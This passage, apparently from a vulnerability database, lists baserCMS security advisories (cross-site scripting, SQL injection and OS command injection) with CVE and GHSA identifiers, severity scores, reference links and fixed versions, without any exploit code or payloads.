vulnerability_id VCID-ggv8-3v9t-mfea
summary 
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is a XSS Vulnerability in Site search Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
7
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary 
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
8
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in HTTP 400 Bad Request to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
9
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in Blog posts feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
10
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
11
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in Edit Email Form Settings Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
12
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in Blog posts and Contents list Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
13
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
